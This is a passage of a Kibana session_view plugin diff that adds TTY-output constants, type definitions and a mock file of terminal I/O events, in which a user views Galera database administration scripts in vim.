'sessionViewIOEvents'; +export const QUERY_KEY_GET_TOTAL_IO_BYTES = 'sessionViewGetTotalIOBytes'; +// other +export const ALERT_STATUS = { + OPEN: 'open', + ACKNOWLEDGED: 'acknowledged', + CLOSED: 'closed', +}; +export const LOCAL_STORAGE_DISPLAY_OPTIONS_KEY = 'sessionView:displayOptions'; export const MOUSE_EVENT_PLACEHOLDER = { stopPropagation: () => undefined } as React.MouseEvent; - export const DEBOUNCE_TIMEOUT = 500; +export const DEFAULT_TTY_PLAYSPEED_MS = 40; // milli seconds per line of tty output. + +// when showing the count of alerts in details panel tab, if the number +// exceeds ALERT_COUNT_THRESHOLD we put a + next to it, e.g 999+ +export const ALERT_COUNT_THRESHOLD = 999; diff --git a/x-pack/plugins/session_view/common/mocks/responses/session_view_io_events.mock.ts b/x-pack/plugins/session_view/common/mocks/responses/session_view_io_events.mock.ts new file mode 100644 index 0000000000000..33b9ac56b035d --- /dev/null +++ b/x-pack/plugins/session_view/common/mocks/responses/session_view_io_events.mock.ts @@ -0,0 +1,228 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { ProcessEventResults } from '../../types/process_tree'; + +export const sessionViewIOEventsMock: ProcessEventResults = { + events: [ + { + _index: 'logs-endpoint.events.process', + _id: '1', + _source: { + '@timestamp': '2022-07-14T11:16:29.570Z', + message: 'hello world security', + event: { + action: 'text_output', + }, + process: { + entity_id: '1', + name: 'bash', + executable: '/bin/bash', + entry_leader: { + entity_id: '1', + }, + io: { + type: 'tty', + total_bytes_captured: 1024, + total_bytes_skipped: 0, + bytes_skipped: [], + text: "256\n,\n Some Companies Puppet instance\n | | | CentOS Stream release 8 on x86_64\n .=/ = = =| =| = === = Load average: 1.23, 1.01, 0.63\n | || || || || || | | | | \n /= = = =' =' =' ' =' Hostname ********\n \\ Type xyz\n o Datacenter ********\n Cluster ********\n\n\n\n\n,0 loaded units listed. Pass --all to see loaded but inactive units, too.\nTo show all installed unit files use 'systemctl list-unit-files'.\n", + }, + }, + }, + }, + + { + _index: 'logs-endpoint.events.process', + _id: '2', + _source: { + '@timestamp': '2022-07-14T11:16:30.570Z', + message: 'hello world security', + event: { + action: 'text_output', + }, + process: { + entity_id: '2', + name: 'vim', + executable: '/bin/vi', + entry_leader: { + entity_id: '1', + }, + io: { + type: 'tty', + total_bytes_captured: 1024, + total_bytes_skipped: 0, + bytes_skipped: [], + text: ',\u001b[?2004h\u001b[?1049h\u001b[22;0;0t\u001b[?1h\u001b=\u001b[?2004h\u001b[1;59r\u001b[?12h\u001b[?12l\u001b[27m\u001b[29m\u001b[m\u001b[H\u001b[2J\u001b[?25l\u001b[59;1H"/usr/local/bin/galera_traffic_start.sh" [readonly] 14L, 397C\u001b[1;1H#!/bin/env bash\n# Copyright (C) 2022, ********(R) Corporation. All rights reserved.\n\n# Script for setting the reject of queries in Galera\n\nmysql -h127.0.0.1 -P6033 -uroot -e "set global wsrep_reject_queries=\'NONE\'" 2>&1\nRC=$?\n\nif [[ $RC != 0 ]]; then\n >&2 echo "Failed to unset the reject of queries on Galera node, exiting."\n exit $RC\nelse\n echo "Successfully unset the reject of queries."\nfi\n\u001b[94m~ \u001b[16;1H~ \u001b[17;1H~ \u001b[18;1H~ \u001b[19;1H~ \u001b[20;1H~ \u001b[21;1H~ \u001b[22;1H~ \u001b[23;1H~ \u001b[24;1H~ \u001b[25;1H~ \u001b[26;1H~ \u001b[27;1H~ \u001b[28;1H~ \u001b[29;1H~ \u001b[30;1H~ \u001b[31;1H~ \u001b[32;1H~ \u001b[33;1H~ \u001b[34;1H~ \u001b[35;1H~ \u001b[36;1H~ \u001b[37;1H~ \u001b[38;1H~ \u001b[39;1H~ \u001b[40;1H~ \u001b[41;1H~ \u001b[42;1H~ \u001b[43;1H~ \u001b[44;1H~ \u001b[45;1H~ \u001b[46;1H~ \u001b[47;1H~ \u001b[48;1H~ \u001b[49;1H~ \u001b[50;1H~ \u001b[51;1H~ \u001b[52;1H~ \u001b[53;1H~ \u001b[54;1H~ \u001b[55;1H~ \u001b[56;1H~ \u001b[57;1H~ \u001b[58;1H~ \u001b[1;1H\u001b[?25h\u0007\u001b[?25l\u001b[m\u001b[59;1H\u001b[K\u001b[59;1H:\u001b[?2004h\u001b[?25hq\r\u001b[?25l\u001b[?2004l\u001b[59;1H\u001b[K\u001b[59;1H\u001b[?2004l\u001b[?1l\u001b>\u001b[?25h\u001b[?1049l\u001b[23;0;0t,\u001b[?2004h\u001b[?1049h\u001b[22;0;0t\u001b[?1h\u001b=\u001b[?2004h\u001b[1;59r\u001b[?12h\u001b[?12l\u001b[27m\u001b[29m\u001b[m\u001b[H\u001b[2J\u001b[?25l\u001b[59;1H"/usr/local/bin/galera_traffic_stop.sh" [readonly] 115L, 3570C\u001b[1;1H#!/bin/env bash\n# Copyright (C) 2022, ********(R) Corporation. All rights reserved.\n\n# Script for rejecting connection on Galera cluster node, either gracefully or not,\n# depending on supplied arguments.\n\nfunction usage() {\n echo "\n This script disables DB connections to Galera node.\n The default is to stop them gracefully.\n\n Usage: $0 [-h] [-w ] [-s ] [-x]\n\n Options:\n -h Prints this help.\n -w Number of seconds for waiting to close the connections.\u001b[17;11HDefault value is to wait for mysql-wait_timeout.\n -s Sleep interval between connections checks.\n -x Kills all connections immediately. Other options are ignored."\n exit\n}\n', + }, + }, + }, + }, + + { + _index: 'logs-endpoint.events.process', + _id: '3', + _source: { + '@timestamp': '2022-07-14T11:16:31.570Z', + message: 'hello world security', + event: { + action: 'text_output', + }, + process: { + entity_id: '2', + name: 'vim', + executable: '/bin/vi', + entry_leader: { + entity_id: '1', + }, + io: { + type: 'tty', + total_bytes_captured: 1024, + total_bytes_skipped: 0, + bytes_skipped: [], + text: '\nfunction get_number_db_connections() {\n # count current\n DB_CONNECTIONS_NUMBER=$(mysql -h127.0.0.1 -P6032 -uadmin -N --silent -e "select count(1) from stats_mysql_processlist where user = \'$DB_USER\' and db like \'db\\_%\' escapee\u001b[26;1H \'\\\'")\n}\n\nfunction set_number_grace_seconds() {\n local mysql_wait_timeout_ms=$(mysql -h127.0.0.1 -P6032 -uadmin -N --silent -e "select variable_value from global_variables where variable_name = \'mysql-wait_timeout\'")\n GRACE_PERIOD=$((($mysql_wait_timeout_ms+1000-1)/1000))\n}\n\nfunction wait_for_connections() {\n local number_of_loops=$(((($GRACE_PERIOD+$SLEEP_INTERVAL-1)/$SLEEP_INTERVAL)))\u001b[37;5Hecho "Waiting for connections to close for up to $GRACE_PERIOD seconds"\u001b[39;5Hfor i in $(seq 0 $number_of_loops); do\u001b[40;9Hget_number_db_connections\u001b[41;9Hif [[ $DB_CONNECTIONS_NUMBER -eq 0 ]]; then\u001b[42;13Hecho "No connection found for user $DB_USER to this node"\u001b[43;13Hbreak\u001b[44;9Helse\u001b[45;13Hecho "$DB_CONNECTIONS_NUMBER connection(s) found, waiting for ${SLEEP_INTERVAL}s, round $i"\u001b[46;13Hsleep $SLEEP_INTERVAL\u001b[47;9Hfi\n done\n}\n\nfunction parse_args() {\n while getopts \'hs:w:x\' opt; do\u001b[53;9Hcase "$opt" in\u001b[54;9Hh)\u001b[55;13Husage\u001b[56;13H;;\u001b[57;9Hs)\u001b[58;13Hif ! [[ $OPTARG =~ ^[0-9]+$ ]]; then\u001b[1;1H\u001b[?25h\u001b[?25l\u001b[59;1H\u001b[K\u001b[59;1H:\u001b[?2004h\u001b[?25hset number\r\u001b[?25l\u001b[1;1H\u001b[38;5;130m 1 \u001b[m#!/bin/env bash\n\u001b[38;5;130m 2 \u001b[m# Copyright (C) 2022, ********(R) Corporation. All rights reserved.\n\u001b[38;5;130m 3 \n 4 \u001b[m# Script for rejecting connection on Galera cluster node, either gracefully or not,\n\u001b[38;5;130m 5 \u001b[m# depending on supplied arguments.\n\u001b[38;5;130m 6 \n 7 \u001b[mfunction usage() {\n\u001b[38;5;130m 8 \u001b[m echo "\n\u001b[38;5;130m 9 \u001b[m This script disables DB connections to Galera node.\n\u001b[38;5;130m 10 \u001b[m The default is to stop them gracefully.\n\u001b[38;5;130m 11 \n 12 \u001b[m Usage: $0 [-h] [-w ] [-s ] [-x]\n\u001b[38;5;130m 13 \n 14 \u001b[m Options:\n\u001b[38;5;130m 15 \u001b[m -h Prints this help.\n\u001b[38;5;130m 16 \u001b[m -w Number of seconds for waiting to close the connections.\n\u001b[38;5;130m 17 \u001b[m Default value is to wait for mysql-wait_timeout.\n\u001b[38;5;130m 18 \u001b[m -s Sleep interval between connections checks.\n\u001b[38;5;130m 19 \u001b[m -x Kills all connections immediately. Other options are ignored."\n\u001b[38;5;130m 20 \u001b[m exit\n\u001b[38;5;130m 21 \u001b[m}\n\u001b[38;5;130m 22 \n 23 \u001b[mfunction get_number_db_connections() {\n\u001b[38;5;130m 24 \u001b[m # count current\n\u001b[38;5;130m 25 \u001b[m DB_CONNECTIONS_NUMBER=$(mysql -h127.0.0.1 -P6032 -uadmin -N --silent -e "select count(1) from stats_mysql_processlist where user = \'$DB_USER\' and db like \'db\\_%%\u001b[26;1H\u001b[38;5;130m \u001b[m\' escape \'\\\'")\n\u001b[38;5;130m 26 \u001b[m}\n\u001b[38;5;130m 27 \n 28 \u001b[mfunction set_number_grace_seconds() {\n\u001b[38;5;130m 29 \u001b[m local mysql_wait_timeout_ms=$(mysql -h127.0.0.1 -P6032 -uadmin -N --silent -e "select variable_value from global_variables where variable_name = \'mysql-wait_timm\u001b[31;1H\u001b[38;5;130m \u001b[meout\'")\u001b[31;16H\u001b[K\u001b[32;1H\u001b[38;5;130m 30 \u001b[m GRACE_PERIOD=$((($mysql_wait_timeout_ms+1000-1)/1000))\n\u001b[38;5;130m 31 \u001b[m}\n\u001b[38;5;130m 32 \u001b[m\u001b[34;10H\u001b[K\u001b[35;1H\u001b[38;5;130m 33 \u001b[mfunction wait_for_connections() {\u001b[35;42H\u001b[K\u001b[36;1H\u001b[38;5;130m 34 \u001b[m local number_of_loops=$(((($GRACE_PERIOD+$SLEEP_INTERVAL-1)/$SLEEP_INTERVAL)))\n\u001b[38;5;130m 35 \u001b[m\u001b[37;10H\u001b[K\u001b[38;1H\u001b[38;5;130m 36 \u001b[m echo "Waiting for connections to close for up to $GRACE_PERIOD seconds"\n\u001b[38;5;130m 37 \u001b[m\u001b[39;9H\u001b[K\u001b[40;1H\u001b[38;5;130m 38 \u001b[m for i in $(seq 0 $number_of_loops); do\n', + }, + }, + }, + }, + + { + _index: 'logs-endpoint.events.process', + _id: '4', + _source: { + '@timestamp': '2022-07-14T11:16:32.570Z', + message: 'hello world security', + event: { + action: 'text_output', + }, + process: { + entity_id: '2', + name: 'vim', + executable: '/bin/vi', + entry_leader: { + entity_id: '1', + }, + io: { + type: 'tty', + total_bytes_captured: 1024, + total_bytes_skipped: 0, + bytes_skipped: [], + text: '\u001b[38;5;130m 39 \u001b[m get_number_db_connections\u001b[41;42H\u001b[K\u001b[42;1H\u001b[38;5;130m 40 \u001b[m if [[ $DB_CONNECTIONS_NUMBER -eq 0 ]]; then\u001b[42;60H\u001b[K\u001b[43;1H\u001b[38;5;130m 41 \u001b[m echo "No connection found for user $DB_USER to this node"\n\u001b[38;5;130m 42 \u001b[m \u001b[8Cbreak\n\u001b[38;5;130m 43 \u001b[m else\u001b[45;21H\u001b[K\u001b[46;1H\u001b[38;5;130m 44 \u001b[m echo "$DB_CONNECTIONS_NUMBER connection(s) found, waiting for ${SLEEP_INTERVAL}s, round $i"\n\u001b[38;5;130m 45 \u001b[m \u001b[10Csleep $SLEEP_INTERVAL\n\u001b[38;5;130m 46 \u001b[m\u001b[8Cfi\n\u001b[38;5;130m 47 \u001b[m done\n\u001b[38;5;130m 48 \u001b[m}\n\u001b[38;5;130m 49 \u001b[m\u001b[51;10H\u001b[K\u001b[52;1H\u001b[38;5;130m 50 \u001b[mfunction parse_args() {\u001b[52;33H\u001b[K\u001b[53;1H\u001b[38;5;130m 51 \u001b[m while getopts \'hs:w:x\' opt; do\n\u001b[38;5;130m 52 \u001b[m case "$opt" in\n\u001b[38;5;130m 53 \u001b[m h)\n\u001b[38;5;130m 54 \u001b[m usage\n\u001b[38;5;130m 55 \u001b[m \u001b[10C;;\n\u001b[38;5;130m 56 \u001b[m s)\u001b[58;19H\u001b[K\u001b[1;9H\u001b[?25h\u001b[?25l\u001b[27m\u001b[29m\u001b[m\u001b[H\u001b[2J\u001b[1;1H\u001b[38;5;130m 58 \u001b[m\u001b[16C>&2 echo "Sleep interval (-s) must be a number"\n\u001b[38;5;130m 59 \u001b[m\u001b[16Cexit 1\n\u001b[38;5;130m 60 \u001b[m\u001b[12Cfi\n\u001b[38;5;130m 61 \u001b[m\u001b[12CARG_SLEEP_INTERVAL="$OPTARG"\n\u001b[38;5;130m 62 \u001b[m\u001b[12C;;\n\u001b[38;5;130m 63 \u001b[m\u001b[8Cw)\n\u001b[38;5;130m 64 \u001b[m\u001b[12Cif ! [[ $OPTARG =~ ^[0-9]+$ ]]; then\n\u001b[38;5;130m 65 \u001b[m\u001b[16C>&2 echo "Wait timeout (-w) must be a number"\n\u001b[38;5;130m 66 \u001b[m\u001b[16Cexit 1\n\u001b[38;5;130m 67 \u001b[m\u001b[12Cfi\n\u001b[38;5;130m 68 \u001b[m\u001b[12CARG_GRACE_PERIOD="$OPTARG"\n\u001b[38;5;130m 69 \u001b[m\u001b[12C;;\n\u001b[38;5;130m 70 \u001b[m\u001b[8Cx)\n\u001b[38;5;130m 71 \u001b[m\u001b[12CARG_KILL_IMMEDIATELY=1\n\u001b[38;5;130m 72 \u001b[m\u001b[12C;;\n\u001b[38;5;130m 73 \u001b[m\u001b[8Cesac\n\u001b[38;5;130m 74 \u001b[m done\n\u001b[38;5;130m 75 \n 76 \u001b[m GRACE_PERIOD=${ARG_GRACE_PERIOD:--1}\n\u001b[38;5;130m 77 \u001b[m SLEEP_INTERVAL=${ARG_SLEEP_INTERVAL:-30}\n\u001b[38;5;130m 78 \u001b[m KILL_IMMEDIATELY=${ARG_KILL_IMMEDIATELY:-0}\n\u001b[38;5;130m 79 \u001b[m}\n\u001b[38;5;130m 80 \n 81 \u001b[mDB_USER="rolap01"\n\u001b[38;5;130m 82 \n 83 \u001b[mparse_args $@\n\u001b[38;5;130m 84 \n 85 \u001b[mif [[ $KILL_IMMEDIATELY == 1 ]]; then\n\u001b[38;5;130m 86 \u001b[m echo "WARNING: Not waiting for connections to close gracefully"\n\u001b[38;5;130m 87 \u001b[m echo "Press any key to continue... wsrep_reject_queries will be set to \'ALL_KILL\'"\n\u001b[38;5;130m 88 \u001b[m read a\n\u001b[38;5;130m 89 \u001b[m mysql -h127.0.0.1 -P3306 -uroot -e "set global wsrep_reject_queries=\'ALL_KILL\'"\n\u001b[38;5;130m 90 \u001b[melse\n\u001b[38;5;130m 91 \u001b[m # Stop accepting queries in mariadb, do not kill opened connections\n\u001b[38;5;130m 92 \u001b[m mysql -h127.0.0.1 -P3306 -uroot -e "set global wsrep_reject_queries=\'ALL\'"\n\u001b[38;5;130m 93 \u001b[mfi\n\u001b[38;5;130m 94 \n 95 \u001b[mexit_code=$?\n', + }, + }, + }, + }, + + { + _index: 'logs-endpoint.events.process', + _id: '5', + _source: { + '@timestamp': '2022-07-14T11:16:33.570Z', + message: 'hello world security', + event: { + action: 'text_output', + }, + process: { + entity_id: '2', + name: 'vim', + executable: '/bin/vi', + entry_leader: { + entity_id: '1', + }, + io: { + type: 'tty', + total_bytes_captured: 1024, + total_bytes_skipped: 0, + bytes_skipped: [], + text: '\u001b[38;5;130m 96 \u001b[mif [[ $exit_code != 0 ]]; then\n\u001b[38;5;130m 97 \u001b[m >&2 echo "Failed to set the reject of queries on Galera node, exiting."\n\u001b[38;5;130m 98 \u001b[m exit $exit_code\n\u001b[38;5;130m 99 \u001b[melse\n\u001b[38;5;130m 100 \u001b[m echo "Successfully stopped accepting queries."\n\u001b[38;5;130m 101 \u001b[m if [[ $KILL_IMMEDIATELY == 1 ]]; then\n\u001b[38;5;130m 102 \u001b[m\u001b[8Cexit\n\u001b[38;5;130m 103 \u001b[m fi\n\u001b[38;5;130m 104 \u001b[mfi\n\u001b[38;5;130m 105 \n 106 \u001b[mif [[ $GRACE_PERIOD == -1 ]]; then\n\u001b[38;5;130m 107 \u001b[m set_number_grace_seconds\n\u001b[38;5;130m 108 \u001b[mfi\n\u001b[38;5;130m 109 \n 110 \u001b[mwait_for_connections\n\u001b[38;5;130m 111 \u001b[mif [[ $DB_CONNECTIONS_NUMBER != 0 ]]; then\n\u001b[38;5;130m 112 \u001b[m get_number_db_connections\n\u001b[38;5;130m 113 \u001b[m >&2 echo "ERROR: There are still $DB_CONNECTIONS_NUMBER opened DB connections."\n\u001b[38;5;130m 114 \u001b[m exit 3\n\u001b[38;5;130m 115 \u001b[mfi\b\b\u001b[?25h\u001b[?25l\u001b[27m\u001b[29m\u001b[m\u001b[H\u001b[2J\u001b[1;1H\u001b[38;5;130m 1 \u001b[m#!/bin/env bash\n\u001b[38;5;130m 2 \u001b[m# Copyright (C) 2022, ********(R) Corporation. All rights reserved.\n\u001b[38;5;130m 3 \n 4 \u001b[m# Script for rejecting connection on Galera cluster node, either gracefully or not,\n\u001b[38;5;130m 5 \u001b[m# depending on supplied arguments.\n\u001b[38;5;130m 6 \n 7 \u001b[mfunction usage() {\n\u001b[38;5;130m 8 \u001b[m echo "\n\u001b[38;5;130m 9 \u001b[m This script disables DB connections to Galera node.\n\u001b[38;5;130m 10 \u001b[m The default is to stop them gracefully.\n\u001b[38;5;130m 11 \n 12 \u001b[m Usage: $0 [-h] [-w ] [-s ] [-x]\n\u001b[38;5;130m 13 \n 14 \u001b[m Options:\n\u001b[38;5;130m 15 \u001b[m -h Prints this help.\n\u001b[38;5;130m 16 \u001b[m -w Number of seconds for waiting to close the connections.\n\u001b[38;5;130m 17 \u001b[m\u001b[10CDefault value is to wait for mysql-wait_timeout.\n\u001b[38;5;130m 18 \u001b[m -s Sleep interval between connections checks.\n\u001b[38;5;130m 19 \u001b[m -x Kills all connections immediately. Other options are ignored."\n\u001b[38;5;130m 20 \u001b[m exit\n\u001b[38;5;130m 21 \u001b[m}\n\u001b[38;5;130m 22 \n 23 \u001b[mfunction get_number_db_connections() {\n\u001b[38;5;130m 24 \u001b[m # count current\n\u001b[38;5;130m 25 \u001b[m DB_CONNECTIONS_NUMBER=$(mysql -h127.0.0.1 -P6032 -uadmin -N --silent -e "select count(1) from stats_mysql_processlist where user = \'$DB_USER\' and db like \'db\\_%%\u001b[26;1H\u001b[38;5;130m \u001b[m\' escape \'\\\'")\n\u001b[38;5;130m 26 \u001b[m}\n\u001b[38;5;130m 27 \n 28 \u001b[mfunction set_number_grace_seconds() {\n\u001b[38;5;130m 29 \u001b[m local mysql_wait_timeout_ms=$(mysql -h127.0.0.1 -P6032 -uadmin -N --silent -e "select variable_value from global_variables where variable_name = \'mysql-wait_timm\u001b[31;1H\u001b[38;5;130m \u001b[meout\'")\n\u001b[38;5;130m 30 \u001b[m GRACE_PERIOD=$((($mysql_wait_timeout_ms+1000-1)/1000))\n\u001b[38;5;130m 31 \u001b[m}\n\u001b[38;5;130m 32 \n', + }, + }, + }, + }, + + { + _index: 'logs-endpoint.events.process', + _id: '6', + _source: { + '@timestamp': '2022-07-14T11:16:34.570Z', + message: 'hello world security', + event: { + action: 'text_output', + }, + process: { + entity_id: '2', + name: 'vim', + executable: '/bin/vi', + entry_leader: { + entity_id: '1', + }, + io: { + type: 'tty', + total_bytes_captured: 1024, + total_bytes_skipped: 0, + bytes_skipped: [], + text: ' 33 \u001b[mfunction wait_for_connections() {\n\u001b[38;5;130m 34 \u001b[m local number_of_loops=$(((($GRACE_PERIOD+$SLEEP_INTERVAL-1)/$SLEEP_INTERVAL)))\n\u001b[38;5;130m 35 \n 36 \u001b[m echo "Waiting for connections to close for up to $GRACE_PERIOD seconds"\n\u001b[38;5;130m 37 \n 38 \u001b[m for i in $(seq 0 $number_of_loops); do\n\u001b[38;5;130m 39 \u001b[m\u001b[8Cget_number_db_connections\n\u001b[38;5;130m 40 \u001b[m\u001b[8Cif [[ $DB_CONNECTIONS_NUMBER -eq 0 ]]; then\n\u001b[38;5;130m 41 \u001b[m\u001b[12Cecho "No connection found for user $DB_USER to this node"\n\u001b[38;5;130m 42 \u001b[m\u001b[12Cbreak\n\u001b[38;5;130m 43 \u001b[m\u001b[8Celse\n\u001b[38;5;130m 44 \u001b[m\u001b[12Cecho "$DB_CONNECTIONS_NUMBER connection(s) found, waiting for ${SLEEP_INTERVAL}s, round $i"\n\u001b[38;5;130m 45 \u001b[m\u001b[12Csleep $SLEEP_INTERVAL\n\u001b[38;5;130m 46 \u001b[m\u001b[8Cfi\n\u001b[38;5;130m 47 \u001b[m done\n\u001b[38;5;130m 48 \u001b[m}\n\u001b[38;5;130m 49 \n 50 \u001b[mfunction parse_args() {\n\u001b[38;5;130m 51 \u001b[m while getopts \'hs:w:x\' opt; do\n\u001b[38;5;130m 52 \u001b[m\u001b[8Ccase "$opt" in\n\u001b[38;5;130m 53 \u001b[m\u001b[8Ch)\n\u001b[38;5;130m 54 \u001b[m\u001b[12Cusage\n\u001b[38;5;130m 55 \u001b[m\u001b[12C;;\n\u001b[38;5;130m 56 \u001b[m\u001b[8Cs)\u001b[1;9H\u001b[?25h\u001b[?25l\u001b[27m\u001b[29m\u001b[m\u001b[H\u001b[2J\u001b[1;1H\u001b[38;5;130m 58 \u001b[m\u001b[16C>&2 echo "Sleep interval (-s) must be a number"\n\u001b[38;5;130m 59 \u001b[m\u001b[16Cexit 1\n\u001b[38;5;130m 60 \u001b[m\u001b[12Cfi\n\u001b[38;5;130m 61 \u001b[m\u001b[12CARG_SLEEP_INTERVAL="$OPTARG"\n\u001b[38;5;130m 62 \u001b[m\u001b[12C;;\n\u001b[38;5;130m 63 \u001b[m\u001b[8Cw)\n\u001b[38;5;130m 64 \u001b[m\u001b[12Cif ! [[ $OPTARG =~ ^[0-9]+$ ]]; then\n\u001b[38;5;130m 65 \u001b[m\u001b[16C>&2 echo "Wait timeout (-w) must be a number"\n\u001b[38;5;130m 66 \u001b[m\u001b[16Cexit 1\n\u001b[38;5;130m 67 \u001b[m\u001b[12Cfi\n\u001b[38;5;130m 68 \u001b[m\u001b[12CARG_GRACE_PERIOD="$OPTARG"\n\u001b[38;5;130m 69 \u001b[m\u001b[12C;;\n\u001b[38;5;130m 70 \u001b[m\u001b[8Cx)\n\u001b[38;5;130m 71 \u001b[m\u001b[12CARG_KILL_IMMEDIATELY=1\n\u001b[38;5;130m 72 \u001b[m\u001b[12C;;\n\u001b[38;5;130m 73 \u001b[m\u001b[8Cesac\n\u001b[38;5;130m 74 \u001b[m done\n\u001b[38;5;130m 75 \n 76 \u001b[m GRACE_PERIOD=${ARG_GRACE_PERIOD:--1}\n\u001b[38;5;130m 77 \u001b[m SLEEP_INTERVAL=${ARG_SLEEP_INTERVAL:-30}\n\u001b[38;5;130m 78 \u001b[m KILL_IMMEDIATELY=${ARG_KILL_IMMEDIATELY:-0}\n\u001b[38;5;130m 79 \u001b[m}\n\u001b[38;5;130m 80 \n 81 \u001b[mDB_USER="rolap01"\n\u001b[38;5;130m 82 \n 83 \u001b[mparse_args $@\n', + }, + }, + }, + }, + + { + _index: 'logs-endpoint.events.process', + _id: '7', + _source: { + '@timestamp': '2022-07-14T11:16:35.570Z', + message: 'hello world security', + event: { + action: 'text_output', + }, + process: { + entity_id: '2', + name: 'vim', + executable: '/bin/vi', + entry_leader: { + entity_id: '1', + }, + io: { + type: 'tty', + total_bytes_captured: 1024, + total_bytes_skipped: 0, + bytes_skipped: [], + text: '\u001b[38;5;130m 84 \n 85 \u001b[mif [[ $KILL_IMMEDIATELY == 1 ]]; then\n\u001b[38;5;130m 86 \u001b[m echo "WARNING: Not waiting for connections to close gracefully"\n\u001b[38;5;130m 87 \u001b[m echo "Press any key to continue... wsrep_reject_queries will be set to \'ALL_KILL\'"\n\u001b[38;5;130m 88 \u001b[m read a\n\u001b[38;5;130m 89 \u001b[m mysql -h127.0.0.1 -P3306 -uroot -e "set global wsrep_reject_queries=\'ALL_KILL\'"\n\u001b[38;5;130m 90 \u001b[melse\n\u001b[38;5;130m 91 \u001b[m # Stop accepting queries in mariadb, do not kill opened connections\n\u001b[38;5;130m 92 \u001b[m mysql -h127.0.0.1 -P3306 -uroot -e "set global wsrep_reject_queries=\'ALL\'"\n\u001b[38;5;130m 93 \u001b[mfi\n\u001b[38;5;130m 94 \n 95 \u001b[mexit_code=$?\n\u001b[38;5;130m 96 \u001b[mif [[ $exit_code != 0 ]]; then\n\u001b[38;5;130m 97 \u001b[m >&2 echo "Failed to set the reject of queries on Galera node, exiting."\n\u001b[38;5;130m 98 \u001b[m exit $exit_code\n\u001b[38;5;130m 99 \u001b[melse\n\u001b[38;5;130m 100 \u001b[m echo "Successfully stopped accepting queries."\n\u001b[38;5;130m 101 \u001b[m if [[ $KILL_IMMEDIATELY == 1 ]]; then\n\u001b[38;5;130m 102 \u001b[m\u001b[8Cexit\n\u001b[38;5;130m 103 \u001b[m fi\n\u001b[38;5;130m 104 \u001b[mfi\n\u001b[38;5;130m 105 \n 106 \u001b[mif [[ $GRACE_PERIOD == -1 ]]; then\n\u001b[38;5;130m 107 \u001b[m set_number_grace_seconds\n\u001b[38;5;130m 108 \u001b[mfi\n\u001b[38;5;130m 109 \n 110 \u001b[mwait_for_connections\n\u001b[38;5;130m 111 \u001b[mif [[ $DB_CONNECTIONS_NUMBER != 0 ]]; then\n\u001b[38;5;130m 112 \u001b[m get_number_db_connections\n\u001b[38;5;130m 113 \u001b[m >&2 echo "ERROR: There are still $DB_CONNECTIONS_NUMBER opened DB connections."\n\u001b[38;5;130m 114 \u001b[m exit 3\n\u001b[38;5;130m 115 \u001b[mfi\b\b\u001b[?25h\u001b[?25l\nType :qa! and press to abandon all changes and exit Vim\u0007\u001b[58;9H\u001b[?25h\u0007\u001b[?25l\u001b[59;1H\u001b[K\u001b[59;1H:\u001b[?2004h\u001b[?25hqa!\r\u001b[?25l\u001b[?2004l\u001b[59;1H\u001b[K\u001b[59;1H\u001b[?2004l\u001b[?1l\u001b>\u001b[?25h\u001b[?1049l\u001b[23;0;0t,\u001bkroot@staging-host:~\u001b\\\n', + }, + }, + }, + }, + + { + _index: 'logs-endpoint.events.process', + _id: '8', + _source: { + '@timestamp': '2022-07-14T11:16:36.570Z', + message: 'hello world security', + event: { + action: 'text_output', + }, + process: { + entity_id: '1', + name: 'bash', + executable: '/bin/bash', + entry_leader: { + entity_id: '1', + }, + io: { + type: 'tty', + total_bytes_captured: 1024, + total_bytes_skipped: 0, + bytes_skipped: [], + text: '\u001bkroot@staging-host:~\u001b\\\b\b\b\b\u001b[1P\b\b\b\b\u001b[1P\b\b\b\b\u001b[1P\b\b\b\b\b\b\b\b\b\n\u001bkroot@staging-host:~\u001b\\\b\u001b[K\b\u001b[K\b\u001b[K\n,\n22/05/26 09:24:09 rack-na/cl_md (md), Cluster ********\n[root@staging-host:~] vi -R /usr/local/bin/galera_traffic_start.sh\u0007\n22/05/26 09:25:32 rack-na/cl_md (md), Cluster ********\n[root@staging-host:~] vi -R /usr/local/bin/galera_traffic_start.sh.sh.sh.sho.shp.sh\n22/05/26 09:30:08 rack-na/cl_md (md), Cluster ********\n[root@staging-host:~] exi\u0007\u0007\u0007exitlogout\n,\u001bec2-user@staging-host:~\u001b\\\n\u001bec2-user@staging-host:~\u001b\\\n,\n22/05/26 09:24:01 rack-na/cl_md (md), Cluster ********\n[ec2-user@staging-host:~] sudo -i\n22/05/26 10:11:37 rack-na/cl_md (md), Cluster ********\n[ec2-user@staging-host:~] exitlogout\n\n', + }, + }, + }, + }, + ], +}; diff --git a/x-pack/plugins/session_view/common/types/process_tree/index.ts b/x-pack/plugins/session_view/common/types/process_tree/index.ts index 04c82e5e9c48d..e620b654db16f 100644 --- a/x-pack/plugins/session_view/common/types/process_tree/index.ts +++ b/x-pack/plugins/session_view/common/types/process_tree/index.ts @@ -21,7 +21,7 @@ export const enum EventAction { fork = 'fork', exec = 'exec', end = 'end', - output = 'output', + text_output = 'text_output', } export interface User { @@ -62,6 +62,20 @@ export interface Teletype { }; } +// used by tty_player component to split process.io.text into lines of IO +export interface IOLine { + value?: string; + + // the following is only set client side for caching purposes + process_name?: string; + process_entity_id?: string; + process_entity_cursor?: string; +} + +export interface IOFields { + text?: string; +} + export interface ProcessFields { entity_id?: string; args?: string[]; @@ -91,6 +105,7 @@ export interface ProcessSelf extends ProcessFields { session_leader?: ProcessFields; entry_leader?: ProcessFields; group_leader?: ProcessFields; + io?: IOFields; } export interface ProcessEventHost { @@ -209,15 +224,15 @@ export interface ProcessEventOrchestrator { name?: string; type?: string; ip?: string; + parent?: { + type?: string; + }; }; namespace?: string; cluster?: { name?: string; id?: string; }; - parent?: { - type?: string; - }; } export interface ProcessEventCloud { diff --git a/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/helpers.test.ts b/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/helpers.test.ts index 61d9a7fb0f6b3..e54bde34fb2f0 100644 --- a/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/helpers.test.ts +++ b/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/helpers.test.ts @@ -47,15 +47,15 @@ const MOCK_ORCHESTRATOR_DATA: ProcessEventOrchestrator = { name: 'pdcsi-node-6hvsp', type: 'pod', ip: 'PLACEHOLDER_FOR_RESOURCE.IP', + parent: { + type: 'PLACEHOLDER_FOR_RESOURCE.PARENT.TYPE', + }, }, namespace: 